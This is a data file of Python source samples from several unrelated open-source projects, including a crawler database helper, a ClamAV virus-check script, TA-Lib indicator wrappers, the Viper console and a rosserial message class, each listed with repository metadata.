def __init__(self):
CompressSectionClassObject.__init__(self)
## GenSection() method
#
# Generate compressed section
#
# @param self The object pointer
# @param OutputPath Where to place output file
# @param ModuleName Which module this section belongs to
# @param SecNum Index of section
# @param KeyStringList Filter for inputs of section generation
# @param FfsInf FfsInfStatement object that contains this section data
# @param Dict dictionary contains macro and its value
# @retval tuple (Generated file name, section alignment)
#
def GenSection(self, OutputPath, ModuleName, SecNum, KeyStringList, FfsInf = None, Dict = {}, IsMakefile = False):
if FfsInf is not None:
self.CompType = FfsInf.__ExtendMacro__(self.CompType)
self.Alignment = FfsInf.__ExtendMacro__(self.Alignment)
SectFiles = tuple()
SectAlign = []
Index = 0
MaxAlign = None
for Sect in self.SectionList:
Index = Index + 1
SecIndex = '%s.%d' %(SecNum, Index)
ReturnSectList, AlignValue = Sect.GenSection(OutputPath, ModuleName, SecIndex, KeyStringList, FfsInf, Dict, IsMakefile=IsMakefile)
if AlignValue is not None:
if MaxAlign is None:
MaxAlign = AlignValue
if GenFdsGlobalVariable.GetAlignment (AlignValue) > GenFdsGlobalVariable.GetAlignment (MaxAlign):
MaxAlign = AlignValue
if ReturnSectList != []:
if AlignValue is None:
AlignValue = "1"
for FileData in ReturnSectList:
SectFiles += (FileData,)
SectAlign.append(AlignValue)
OutputFile = OutputPath + \
os.sep + \
ModuleName + \
SUP_MODULE_SEC + \
SecNum + \
SectionSuffix['COMPRESS']
OutputFile = os.path.normpath(OutputFile)
DummyFile = OutputFile + '.dummy'
GenFdsGlobalVariable.GenerateSection(DummyFile, SectFiles, InputAlign=SectAlign, IsMakefile=IsMakefile)
GenFdsGlobalVariable.GenerateSection(OutputFile, [DummyFile], Section.Section.SectionType['COMPRESS'],
CompressionType=self.CompTypeDict[self.CompType], IsMakefile=IsMakefile)
OutputFileList = []
OutputFileList.append(OutputFile)
return OutputFileList, self.Alignment
|
JaySon-Huang/WebModel
|
WebModel/database/databasehelper.py
|
Python
|
mit
| 4,676
| 0.032
|
# -*- coding: utf-8 -*-
import sqlite3
VERBOSE = 0
CTABLE_DOMAIN = '''
CREATE TABLE IF NOT EXISTS Domains(
did INTEGER PRIMARY KEY AUTOINCREMENT,
domain VARCHAR(64) UNIQUE,
indegree INTEGER,
outdegree INTEGER
)'''
CTABLE_WEBSITE = '''
CREATE TABLE IF NOT EXISTS Websites(
wid INTEGER PRIMARY KEY AUTOINCREMENT,
did INTEGER,
url VARCHAR(256) NOT NULL UNIQUE,
title VARCHAR(100),
visited bit,
FOREIGN KEY (did) REFERENCES Domains(did)
)'''
CTABLE_RULESETS = '''
CREATE TABLE IF NOT EXISTS Rulesets(
rid INTEGER PRIMARY KEY AUTOINCREMENT,
did INTEGER,
rules VARCHAR(512),
FOREIGN KEY (did) REFERENCES Domains(did)
)'''
class DatabaseHelper(object):
def __init__(self):
'''创建表'''
self.conn = sqlite3.connect("./items.db")
if VERBOSE:
print 'Database connection OPEN.'
# Domain 表
self.conn.execute(CTABLE_DOMAIN)
# Website 表
self.conn.execute(CTABLE_WEBSITE)
# Rule 表
self.conn.execute(CTABLE_RULESETS)
self.conn.commit()
if VERBOSE:
cur = self.conn.cursor()
print 'Tables:',cur.execute("SELECT name FROM sqlite_master WHERE type = 'table'").fetchall()
def close(self):
'''关闭与数据库的连接'''
if VERBOSE:
print 'Database connection CLOSE.'
self.conn.close()
def insertDomain(self, domain, indegree=0, outdegree=0):
'''增加一个域名'''
cur = self.conn.cursor()
cur.execute("INSERT INTO Domains VALUES (NULL,?,?,?)", (domain, indegree, outdegree))
# 写入到文件中
self.conn.commit()
def insertRuleset(self, ruleset, domain):
'''增加一个robots.txt规则集'''
cur = self.conn.cursor()
cur.execute("SELECT did FROM Domains WHERE domain=?", (domain,))
did = cur.fetchone()[0]
cur.execute("INSERT INTO Rulesets VALUES (NULL,?,?)",(did, ruleset))
# 写入到文件
self.conn.commit()
def insertWebsite(self, url, domain):
'''增加一个网页,标记为未访问,并对相应的domain增加其入度'''
cur = self.conn.cursor()
cur.execute("SELECT 1 FROM Domains WHERE domain=?", (domain,))
result = cur.fetchone()
if not result:
# 未有对应domain记录, 先创建domain, 把入度设为1
if VERBOSE:
print 'Spot Domain:',domain
self.insertDomain(domain, indegree=1)
cur.execute("SELECT did FROM Domains WHERE domain=?", (domain,))
did = cur.fetchone()[0]
else:
did = result[0]
# 对应的domain记录已经存在, 对其入度+1
cur.execute("UPDATE Domains SET outdegree=outdegree+1 WHERE domain=?", (domain,))
cur.execute("INSERT INTO Websites VALUES (NULL,?,?,NULL,0)", (did, url,))
# 写入到文件
self.conn.commit()
def updateInfo(self, item, newlinks, oldlinks):
'''爬虫爬完之后对数据库内容进行更新'''
cur = self.conn.cursor()
cur.execute("SELECT wid,did FROM Websites WHERE url=?", (item['url'],))
wid, did = cur.fetchone()
# website记录更新
cur.execute("UPDATE Websites SET title=?,visited=1 WHERE wid=?", (item['title'], wid,))
# 对应的domain记录中出度也需要更新
cur.execute("UPDATE Domains SET outdegree=outdegree+? WHERE did=?", (len(item['links']), did,))
# 对该网页中所有链接涉及的记录进行更新
# 外部判断未出现过的链接
for link,domain in newlinks:
self.insertWebsite(link, domain)
# 外部判断出现过的链接
for link,domain in oldlinks:
# 对对应的domain记录入度增加
cur.execute("UPDATE Domains SET outdegree=outdegree+1 WHERE domain=?", (domain,))
# 写入到文件
self.conn.commit()
def robotsrulesetOfDomain(self, domain):
'''检查domain是否在数据库中,
否 --> (False, None)
是 --> (True, 数据库中存储的robots.txt内容)
'''
exist = False
cur = self.conn.cursor()
# 是否存在
cur.execute("SELECT 1 FROM Domains WHERE domain=?", (domain,))
if cur.fetchone() :
exist = True
# 存在的话,结果是什么
cur.execute("SELECT rules FROM Domains,Rulesets "
"WHERE domain=? AND Domains.did=Rulesets.did"
,(domain,) )
ruleset = cur.fetchone()
return (exist, ruleset)
def rollback(self):
self.conn.rollback()
def showAll(self):
self.conn.commit()
cur = self.conn.cursor()
cur.execute("SELECT * FROM Domains")
print cur.fetchall()
cur.execute("SELECT * FROM Websites")
print cur.fetchall()
_dbcli = None
def getCliInstance():
global _dbcli
if not _dbcli:
_dbcli = DatabaseHelper()
return _dbcli
def test():
dbcli = getCliInstance()
# dbcli.in
|
sertDomain('jaysonhwang.com')
# dbcli.insertRuleset('test','jaysonhwang.com')
print dbcli.robotsrulesetOfDomain('www.zol.com')
print dbcli.robotsrulesetOfDomain('jayson
|
.com')
dbcli.showAll()
dbcli.close()
if __name__ == '__main__':
test()
|
artefactual/archivematica-history
|
src/MCPClient/lib/clientScripts/archivematicaClamscan.py
|
Python
|
agpl-3.0
| 2,652
| 0.003771
|
#!/usr/bin/python -OO
# This file is part of Archivematica.
#
# Copyright 2010-2012 Artefactual Systems Inc. <http://artefactual.com>
#
# Archivematica is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Archivematica is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Archivematica. If not, see <http://www.gnu.org/licenses/>.
# @package Archi
|
vematica
# @subpackage archivematicaClientScript
# @author Joseph Perry <joseph@artefactual.com>
# @version svn: $Id$
#source /etc/archivematica
|
/archivematicaConfig.conf
import os
import sys
sys.path.append("/usr/lib/archivematica/archivematicaCommon")
from executeOrRunSubProcess import executeOrRun
from databaseFunctions import insertIntoEvents
from archivematicaFunctions import escapeForCommand
clamscanResultShouldBe="Infected files: 0"
if __name__ == '__main__':
fileUUID = sys.argv[1]
target = sys.argv[2]
date = sys.argv[3]
taskUUID = sys.argv[4]
command = 'clamdscan - <"' + escapeForCommand(target) + '"'
print >>sys.stderr, command
commandVersion = "clamdscan -V"
eventOutcome = "Pass"
clamscanOutput = executeOrRun("bashScript", command, printing=False)
clamscanVersionOutput = executeOrRun("command", commandVersion, printing=False)
if clamscanOutput[0] or clamscanVersionOutput[0]:
if clamscanVersionOutput[0]:
print >>sys.stderr, clamscanVersionOutput
exit(2)
else:
eventOutcome = "Fail"
if eventOutcome == "Fail" or clamscanOutput[1].find(clamscanResultShouldBe) == -1:
eventOutcome = "Fail"
print >>sys.stderr, fileUUID, " - ", os.path.basename(target)
print >>sys.stderr, clamscanOutput
version, virusDefs, virusDefsDate = clamscanVersionOutput[1].split("/")
virusDefs = virusDefs + "/" + virusDefsDate
eventDetailText = "program=\"Clam AV\"; version=\"" + version + "\"; virusDefinitions=\"" + virusDefs + "\""
if fileUUID != "None":
insertIntoEvents(fileUUID=fileUUID, eventIdentifierUUID=taskUUID, eventType="virus check", eventDateTime=date, eventDetail=eventDetailText, eventOutcome=eventOutcome, eventOutcomeDetailNote="")
if eventOutcome != "Pass":
exit(3)
|
sinomiko/project
|
python_project/python/PythonProj/ReadWriteFile.py
|
Python
|
bsd-3-clause
| 1,234
| 0.028363
|
outfile=open("helloworld.txt","w")
for num1 in range(1,10):
for num2 in range(1,10):
if num2<=num1 :
outfile.write("{}*{}={} ".format(num2, num1 ,num1 * num2))
outfi
|
le.write(" \n")
outfile.flush()
outfile.close()
infile=open("helloworld.txt","r")
for line in
|
infile.readlines():
print line
infile.close()
import sys
sys.stdout.write("foo\n")
sys.stderr.write("foo2 \n")
def test_var_kwargs(farg, **kwargs):
print "formal arg:", farg
for key in kwargs:
print "arg: {}:{}".format(key, kwargs[key])
test_var_kwargs(2,a="sd",b="ds")
def return_stuff(var):
return [1, 2,{'a':1, 'b':2},'string']
a=return_stuff(1)
print a
x=222
def t1():
global x
x=111
t1()
print x
import os
for ld in os.listdir("c:/Miko"):
print ld
print os.listdir("c:/Miko")
class Person(object):
def __init__(self, first_name, last_name):
self.first_name = first_name
self.last_name = last_name
def get_first_name(self):
return self.first_name
def set_first_name(self, new_name):
self.first_name = new_name
p = Person("John", "Smith")
#p.set_first_name("FooJohn")
print p.get_first_name()
print dir(p)[-4:]
class Single(object):
def __i
|
newhavenrc/nhrc2
|
tests/test_get_neighborhoods.py
|
Python
|
mit
| 1,060
| 0.007547
|
#!/usr/bin/env python
"""
PURPOSE: The routines in this file test the get_neighborhoods module.
Created on 2015-04-02T21:24:17
"""
from __future__ import division, print_function
#import numpy as np
#from types import *
#from nose.tools import raises
#import pandas as pd
import nhrc2.backend.read_seeclickfix_api_to_csv as rscf
from nhrc2.backend import get_neighborhoods as get_ngbrhd
__author__ = "Matt Giguere (github: @mattgiguere)"
__license__ = "MIT"
__version__ = '0.0.1'
__maintainer__ = "Matt Giguere"
__email__ = "matthew.giguere@yale.edu"
__status__ = " Development NOT(Prototype or Production)"
#make sure the number of neighborhoods is equal to
|
the number of issues.
def test_get_neighborhoods():
"""
Ensure the number in the hood list length = the number of issues
"""
scf_cats = rscf.read_categories(readfile=True)
issues = rscf.read_issues(scf_cats, readfile=True)
hoods = get_ngbrhd.get_neighborhoods()
assert len(issues) == len(hoods)
#@raises(ValueErro
|
r)
#def test_make_function_raise_value_error():
|
jackwluo/py-quantmod
|
quantmod/ta.py
|
Python
|
mit
| 33,467
| 0
|
"""Wrappers around Ta-Lib technical indicators
Python native indicators in 'tanolib.py' file.
"""
import numpy as np
import pandas as pd
import talib
from . import utils
from .valid import VALID_TA_KWARGS
# Overlap studies
def add_MA(self, timeperiod=20, matype=0,
type='line', color='secondary', **kwargs):
"""Moving Average (customizable)."""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = 'MA({})'.format(str(timeperiod))
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.MA(self.df[self.cl].values,
timeperiod, matype)
def add_SMA(self, timeperiod=20,
type='line', color='secondary', **kwargs):
"""Simple Moving Average."""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = 'SMA({})'.format(str(timeperiod))
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.SMA(self.df[self.cl].values,
timeperiod)
def add_EMA(self, timeperiod=26,
type='line', color='secondary', **kwargs):
"""Exponential Moving Average."""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = 'EMA({})'.format(str(timeperiod))
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.EMA(self.df[self.cl].values,
timeperiod)
def add_WMA(self, timeperiod=20,
type='line', color='secondary', **kwargs):
"""Weighted Moving Average."""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = 'WMA({})'.format(str(timeperiod))
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.WMA(self.df[self.cl].values,
timeperiod)
def add_DEMA(self, timeperiod=26,
type='line', color='secondary', **kwargs):
"""Double Exponential Moving Average."""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = 'DEMA({})'.format(str(timeperiod))
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.DEMA(self.df[self.cl].values,
timeperiod)
def add_TEMA(self, timeperiod=26,
type='line', color='secondary', **kwargs):
"""Triple Moving Exponential Average."""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = 'TEMA({})'.format(str(timeperiod))
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.TEMA(self.df[self.cl].values,
timeperiod)
def add_T3(self, timeperiod=20, vfactor=0.7,
type='line', color='secondary', **kwargs):
"""T3 Exponential Moving Average."""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = 'T3({}, {})'.format(str(timeperiod), str(vfactor))
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.T3(self.df[self.cl].values,
timeperiod, vfactor)
def add_KAMA(self, timeperiod=20,
type='line', color='secondary', **kwargs):
"""Kaufmann Adaptive Moving Average."""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = 'KAMA({})'.format(str(timeperiod))
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.KAMA(self.df[self.cl].values,
timeperiod)
def add_TRIMA(self, timeperiod=20,
type='line', color='secondary', **kwargs):
"""Triangular Moving Average."""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = 'TRIMA({})'.format(str(timeperiod))
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.TRIMA(self.df[self.cl].values,
timeperiod)
def add_MAMA(self, fastlimit=0.5, slowlimit=0.05,
types=['line', 'line'], colors=['secondary', 'tertiary'],
**kwargs):
"""MESA Adaptive Moving Average.
Note that the first argument of types and colors refers to MAMA while the
second argument refers to FAMA.
"""
if not self.has_close:
|
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
kwargs['type'] = kwargs['kind']
if 'kinds' in kwargs:
types = kwargs['type']
if 'type' in kwargs:
types = [kwargs['type']] * 2
if 'color' in kwargs:
|
colors = [kwargs['color']] * 2
mama = 'MAMA({},{})'.format(str(fastlimit), str(slowlimit))
fama = 'FAMA({},{})'.format(str(fastlimit), str(slowlimit))
self.pri[mama] = dict(type=types[0], color=colors[0])
self.pri[fama] = dict(type=types[1], color=colors[1])
self.ind[mama], self.ind[fama] = talib.MAMA(self.df[self.cl].values,
fastlimit, slowlimit)
def add_MAVP(self, periods, minperiod=2, maxperiod=30, matype=0,
type='line', color='secondary', **kwargs):
"""Moving Average with Variable Period.
Parameters
----------
periods : Series or array
Moving Average period over timeframe to analyze, as a 1-dimensional
shape of same length as chart.
"""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
if isinstance(periods, pd.Series):
periods = periods.values
elif isinstance(periods, np.ndarray):
pass
else:
raise TypeError("Invalid periods {0}. "
"It should be Series or array."
.format(periods))
name = 'MAVP({},{})'.format(str(minperiod), str(maxperiod))
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.MAVP(self.df[self.cl].values,
periods, minperiod, maxperiod, matype)
def add_BBANDS(self, timeperiod=20, nbdevup=2, nbdevdn=2, matype=0,
types=['line_dashed_thin', 'line_dashed_thin'],
colors=['tertiary', 'grey_strong'], **kwargs):
"""Bollinger Bands.
Note that the first argument of types and colors refers to upper and lower
bands while second argument refers to middle band. (Upper and lower are
symmetrical arguments, hence only 2 needed.)
"""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
kwargs['type'] = kwargs['kind']
if 'kinds' in kwargs:
types = kwargs['type']
if 'type' in kwargs:
types = [kwargs['type']] * 2
if 'color' in kwargs:
colors = [kwargs['color']] * 2
name = 'BBANDS({},{},{})'.format(str(timeperiod),
str(nbdevup),
str(nbdevdn))
ubb = name + '[Upper]'
bb = name
lbb = name + '[Lower]'
self.pri[ubb] = dict(type='line_' + types[0][5:],
color=colors[0])
self.pri[bb] = dict(type='area_' + types[1][5:],
color=colors[1], fillcolor='fill')
self.pri[lbb] = dict(type='area_' + types[0][5:],
color=colors[0], fillcolor='fill')
(self.ind[ubb],
self.ind[bb],
self.ind[lbb]) = talib.BBANDS(self.df[self.cl].values,
|
andychase/classwork
|
cs496/assignment_3/test.py
|
Python
|
mit
| 2,361
| 0.000424
|
import json
import uuid
import unittest
from main import app
from app import redis
class FlaskTestCase(unittest.TestCase):
def setUp(self):
app.config['TESTING'] = True
self.app = app.test_client()
self.site_host = str(uuid.uuid4())
def tearDown(self):
pass # self.delete_site()
def make_site(self):
self.app.post('/site/new', data=dict(
site=self.site_host,
style="",
text="test",
x=0,
y=0
))
def delete_site(self):
self.app.delete('/site/delete/{}'.format(self.site_host))
def get_site_data(self):
response = self.app.get('/site/get/{}'.format(self.site_host))
site_data = json.loads(response.data.decode())
return site_data
def test_create_and_destroy_site(self):
def get_site_keys():
return set(redis.keys(self.site_host + '*'))
self.assertSetEqual(get_site_keys(), set())
self.make_site()
self.assertSetEqual(get_site_keys(), {
self.site_host,
self.site_host + "_1",
self.site_host + "_magnet_index",
})
self.assertSetEqual(set(redis.sscan_iter(self.site_host)), {"1"})
self.delete_site()
self.assertSetEqual(get_site_keys(), set())
def test_add_magnet(self):
self.make_site()
self.assertDictEqual(self.get_site_data(), {
'mags': [
dict(
style="",
text="test",
x=0,
y=0
)
],
'ok': True
})
def test_remove_magnet(self):
self.make_site()
|
self.app.delete('/mag/delete', data={
'site': self.site_host,
'mag_id': 1
})
|
self.assertDictEqual(self.get_site_data(), {
'mags': [],
'ok': True
})
def test_move_magnet(self):
self.make_site()
self.app.put(
'/mag/move',
data=dict(site=self.site_host, mag_id=1, x=10, y=10)
)
self.assertDictEqual(self.get_site_data(), {
'mags': [
{'style': '', 'text': 'test', 'x': 10, 'y': 10}
],
'ok': True
})
if __name__ == '__main__':
unittest.main()
|
cwtaylor/viper
|
viper/core/ui/console.py
|
Python
|
bsd-3-clause
| 9,307
| 0.002256
|
# This file is part of Viper - https://github.com/viper-framework/viper
# See the file 'LICENSE' for copying permission.
import os
from os.path import expanduser
import sys
import glob
import atexit
import readline
import traceback
from viper.common.out import print_error, print_outpu
|
t
from viper.common.colors import cyan, magenta, white, bold, blue
from viper.core.session import __sessions__
from viper.core.plugins import __modules__
from viper.core.project import __project__
from viper.core.ui.commands import Commands
from viper.core.database import Database
from viper.core.config import Config, console_output
cfg = Config()
# For python2 & 3 compat, a bit dirty, but it seems to be the least bad one
try:
input = raw_input
except NameError:
|
pass
def logo():
print(""" _
(_)
_ _ _ ____ _____ ____
| | | | | _ \| ___ |/ ___)
\ V /| | |_| | ____| |
\_/ |_| __/|_____)_| v1.3-dev
|_|
""")
db = Database()
count = db.get_sample_count()
try:
db.find('all')
except:
print_error("You need to update your Viper database. Run 'python update.py -d'")
sys.exit()
if __project__.name:
name = __project__.name
else:
name = 'default'
print(magenta("You have " + bold(count)) +
magenta(" files in your " + bold(name)) +
magenta(" repository"))
class Console(object):
def __init__(self):
# This will keep the main loop active as long as it's set to True.
self.active = True
self.cmd = Commands()
def parse(self, data):
root = ''
args = []
# Split words by white space.
words = data.split()
# First word is the root command.
root = words[0]
# If there are more words, populate the arguments list.
if len(words) > 1:
args = words[1:]
return (root, args)
def keywords(self, data):
# Check if $self is in the user input data.
if '$self' in data:
# Check if there is an open session.
if __sessions__.is_set():
# If a session is opened, replace $self with the path to
# the file which is currently being analyzed.
data = data.replace('$self', __sessions__.current.file.path)
else:
print("No open session")
return None
return data
def stop(self):
# Stop main loop.
self.active = False
def start(self):
# Logo.
logo()
# Setup shell auto-complete.
def complete(text, state):
# Try to autocomplete commands.
cmds = [i for i in self.cmd.commands if i.startswith(text)]
if state < len(cmds):
return cmds[state]
# Try to autocomplete modules.
mods = [i for i in __modules__ if i.startswith(text)]
if state < len(mods):
return mods[state]
# Then autocomplete paths.
if text.startswith("~"):
text = "{0}{1}".format(expanduser("~"), text[1:])
return (glob.glob(text+'*')+[None])[state]
# Auto-complete on tabs.
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind('tab: complete')
readline.set_completer(complete)
# Save commands in history file.
def save_history(path):
readline.write_history_file(path)
# If there is an history file, read from it and load the history
# so that they can be loaded in the shell.
# Now we are storing the history file in the local project folder
history_path = os.path.join(__project__.path, 'history')
if os.path.exists(history_path):
readline.read_history_file(history_path)
# Register the save history at program's exit.
atexit.register(save_history, path=history_path)
# Main loop.
while self.active:
# If there is an open session, we include the path to the opened
# file in the shell prompt.
# TODO: perhaps this block should be moved into the session so that
# the generation of the prompt is done only when the session's
# status changes.
prefix = ''
if __project__.name:
prefix = bold(cyan(__project__.name)) + ' '
if __sessions__.is_set():
stored = ''
filename = ''
if __sessions__.current.file:
filename = __sessions__.current.file.name
if not Database().find(key='sha256', value=__sessions__.current.file.sha256):
stored = magenta(' [not stored]', True)
misp = ''
if __sessions__.current.misp_event:
misp = '[MISP'
if __sessions__.current.misp_event.event.id:
misp += ' {}'.format(__sessions__.current.misp_event.event.id)
else:
misp += ' New Event'
if __sessions__.current.misp_event.off:
misp += ' (Offline)'
misp += ']'
prompt = (prefix + cyan('viper ', True) +
white(filename, True) + blue(misp, True) + stored + cyan(' > ', True))
# Otherwise display the basic prompt.
else:
prompt = prefix + cyan('viper > ', True)
# Wait for input from the user.
try:
data = input(prompt).strip()
except KeyboardInterrupt:
print("")
# Terminate on EOF.
except EOFError:
self.stop()
print("")
continue
# Parse the input if the user provided any.
else:
# If there are recognized keywords, we replace them with
# their respective value.
data = self.keywords(data)
# Skip if the input is empty.
if not data:
continue
# Check for output redirection
# If there is a > in the string, we assume the user wants to output to file.
if '>' in data:
data, console_output['filename'] = data.split('>')
print("Writing output to {0}".format(console_output['filename'].strip()))
# If the input starts with an exclamation mark, we treat the
# input as a bash command and execute it.
# At this point the keywords should be replaced.
if data.startswith('!'):
os.system(data[1:])
continue
# Try to split commands by ; so that you can sequence multiple
# commands at once.
# For example:
# viper > find name *.pdf; open --last 1; pdf id
# This will automatically search for all PDF files, open the first entry
# and run the pdf module against it.
split_commands = data.split(';')
for split_command in split_commands:
split_command = split_command.strip()
if not split_command:
continue
# If it's an internal command, we parse the input and split it
# between root command and arguments.
root, args = self.parse(split_command)
# Check if the command instructs to terminate.
if root in ('exit', 'quit'):
self.stop()
continue
try:
# If the root command is part of the embedded commands list we
# execute it.
if root in self.cmd.commands:
self.cmd.commands[root]['obj'](*args)
del(self.cmd.output[:])
|
blutjens/perc_neuron_ros_ur10
|
pn_ros/bjorn_ws/devel/lib/python2.7/dist-packages/rosserial_msgs/msg/_TopicInfo.py
|
Python
|
gpl-3.0
| 7,843
| 0.021293
|
"""autogenerated by genpy from rosserial_msgs/TopicInfo.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class TopicInfo(genpy.Message):
_md5sum = "0ad51f88fc44892f8c10684077646005"
_type = "rosserial_msgs/TopicInfo"
_has_header = False #flag to mark the presence of a Header object
_full_text = """# special topic_ids
uint16 ID_PUBLISHER=0
uint16 ID_SUBSCRIBER=1
uint16 ID_SERVICE_SERVER=2
uint16 ID_SERVICE_CLIENT=4
uint16 ID_PARAMETER_REQUEST=6
uint16 ID_LOG=7
uint16 ID_TIME=10
uint16 ID_TX_STOP=11
# The endpoint ID for this topic
uint16 topic_id
string topic_name
string message_type
# MD5 checksum for this message type
string md5sum
# size of the buffer message must fit in
int32 buffer_size
"""
# Pseudo-constants
ID_PUBLISHER = 0
ID_SUBSCRIBER = 1
ID_SERVICE_SERVER = 2
ID_SERVICE_CLIENT = 4
ID_PARAMETER_REQUEST = 6
ID_LOG = 7
ID_TIME = 10
ID_TX_STOP = 11
__slots__ = ['topic_id','topic_name','message_type','md5sum','buffer_size']
_slot_types = ['uint16','string','string','string','int32']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
topic_id,topic_name,message_type,md5sum,buffer_size
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(TopicInfo, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.topic_id is None:
self.topic_id = 0
if self.topic_name is None:
self.topic_name = ''
if self.message_type is None:
self.message_type = ''
if self.md5sum is None:
self.md5sum = ''
if self.buffer_size is None:
self.buffer_size = 0
else:
self.topic_id = 0
self.topic_name = ''
self.message_type = ''
self.md5sum = ''
self.buffer_size = 0
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
buff.write(_struct_H.pack(self.topic_id))
_x = self.topic_name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.message_type
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(
|
struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I
|
%ss'%length, length, _x))
_x = self.md5sum
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_struct_i.pack(self.buffer_size))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
end = 0
start = end
end += 2
(self.topic_id,) = _struct_H.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topic_name = str[start:end].decode('utf-8')
else:
self.topic_name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.message_type = str[start:end].decode('utf-8')
else:
self.message_type = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.md5sum = str[start:end].decode('utf-8')
else:
self.md5sum = str[start:end]
start = end
end += 4
(self.buffer_size,) = _struct_i.unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
buff.write(_struct_H.pack(self.topic_id))
_x = self.topic_name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.message_type
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.md5sum
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_struct_i.pack(self.buffer_size))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
end = 0
start = end
end += 2
(self.topic_id,) = _struct_H.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topic_name = str[start:end].decode('utf-8')
else:
self.topic_name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.message_type = str[start:end].decode('utf-8')
else:
self.message_type = str[start:end]
